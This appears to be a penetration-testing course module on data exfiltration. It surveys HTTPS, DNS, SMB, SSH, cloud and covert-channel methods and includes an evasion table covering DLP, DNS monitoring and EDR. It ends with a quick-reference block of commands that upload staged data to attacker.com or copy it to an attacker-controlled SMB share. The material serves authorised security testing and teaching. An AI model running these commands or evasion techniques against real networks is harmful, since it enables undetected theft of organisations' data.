Back to All Modules

11 - Data Exfiltration

#Overview

Data exfiltration is the phase where sensitive information is extracted from the target environment to demonstrate business impact. In a penetration test, the goal is not to actually steal data but to prove that data theft is possible -- typically by exfiltrating a small, non-sensitive flag file or screenshot as proof of concept.

This phase validates the risk rating of the findings that led to compromise. A low-privileged web shell is a Medium finding. That same web shell leading to extraction of the customer database is a Critical finding. The difference is data exfiltration.

#When to Exfiltrate

Exfiltration is the final proof-of-impact phase. It typically occurs:

  • After you have accessed a high-value target (database server, file server, domain controller)
  • When you need to demonstrate the impact of a privilege escalation or lateral movement chain
  • As the culminating evidence for the executive summary of the report
  • Before beginning cleanup and report writing

#Exfiltration Methods

#HTTPS Exfiltration (Preferred)

  • Why: Blends with normal web traffic. Encrypted. Rarely blocked outbound.
  • How: Upload to an attacker-controlled web server via curl, wget --post-file, or Invoke-WebRequest
  • OPSEC: Use a legitimate-looking domain with a valid TLS certificate. POST requests are better than GET for carrying payloads.

#DNS Exfiltration

  • Why: DNS queries almost always leave the network. Often unmonitored.
  • How: Encode data into DNS query subdomains (e.g., base64data.attacker.com). Requires a DNS server you control.
  • Limitations: Slow (small packet sizes), requires chunking, detectable by DNS security products
  • Tools: dnscat2, iodine, custom Python scripts

#SMB / File Share Exfiltration

  • Why: Fast for large files. Blends with internal file share traffic.
  • How: Stage data on an internal share, then pull it from an attacker-hosted SMB server. Impacket's smbserver.py is the standard tool.

#SSH / SCP / SFTP

  • Why: Encrypted, commonly allowed outbound, native on Linux
  • How: scp file user@attacker-ip:/path, sftp, or ssh user@attacker-ip "cat > file" < localfile
  • OPSEC: Outbound SSH may be monitored. Use a non-standard port or tunnel through HTTPS.

#Cloud Service Exfiltration

  • Why: Blends with legitimate cloud traffic (AWS S3, Azure Blob, Google Drive, Dropbox)
  • How: Upload data using cloud CLI tools or API calls. Requires credentials.
  • OPSEC: Very hard to distinguish from normal business operations

#ICMP / Covert Channels

  • Why: Works when all other outbound protocols are blocked
  • How: Tunneling data through ICMP echo request/reply packets
  • Limitations: Very slow, highly unusual if monitored, easily rate-limited
  • Tools: ptunnel, icmpsh, custom scapy scripts

#Physical / Sneakernet

  • Why: For air-gapped networks where no outbound connectivity exists
  • How: Write data to USB, print to PDF/paper, encode in QR codes, audio exfiltration
  • Context: Rarely in scope for network pentests; more relevant for physical security assessments

#OPSEC Considerations

  • Data volume matters: Exfiltrating 10GB will trigger alarms. Exfiltrating 100KB of critical data may not. Demonstrate the path, not the volume.
  • Timing: Exfiltrate during peak business hours when traffic volume masks your activity. Do not exfiltrate at 3 AM when network traffic is a trickle.
  • Protocol choice: HTTPS POST to a legitimate-looking domain is the gold standard for stealth.
  • Encryption: Always encrypt exfiltrated data in transit (HTTPS, SSH) and at rest on your server. The data must be protected even if your server is compromised.
  • Staging: Stage data on an intermediate internal host before exfiltration. Do not exfiltrate directly from the high-value target.
  • Log evidence: Document what you exfiltrated as proof-of-concept. This is critical for the report.
  • Cleanup: Delete staging files from internal hosts during the cleanup phase.

#Detection Avoidance

Detection MechanismEvasion Technique
DLP (Data Loss Prevention)Encrypt data before exfiltration; chunk into smaller pieces
Network flow analysisExfiltrate during peak hours; use common protocols (HTTPS)
DNS monitoringLimit query rate; use TXT records instead of A records; random delays
Proxy / content filteringUse allowed services (Office 365, Google Drive); avoid known-bad domains
EDR file access monitoringAccess files with native tools; avoid mimikatz-like memory scraping
Volume-based alertsLimit exfiltration to small, targeted data; demonstrate path not volume

#What's in This Section

FileCovers
exfiltration-techniques.mdAll exfiltration methods in detail: HTTPS via curl/PowerShell, DNS tunneling setup (dnscat2/iodine), SMB staging and pull, SSH/SCP transfer, cloud service API exfiltration, ICMP tunneling, encoding and compression strategies, staging directory management, proof-of-concept file creation

#Cross-References

  • 10-persistence -- Persistence may provide the stable access needed for staged exfiltration
  • 12-reporting-cleanup -- Clean up staging files and close exfiltration channels during cleanup

#Quick Reference: Exfiltration Commands

# HTTPS POST (Linux)
curl -F "file=@/tmp/staged_data.zip" https://attacker.com/upload

# HTTPS POST (Windows)
Invoke-WebRequest -Uri https://attacker.com/upload -Method Post -InFile C:\temp\data.zip

# Impacket SMB server (on attacker)
impacket-smbserver -smb2support share /tmp/exfil

# Copy to attacker SMB share (on target)
copy C:\temp\data.zip \\10.10.14.5\share\data.zip

# DNS exfiltration (setup listener)
python3 dnscat2-server.py
BASH

#Key Principle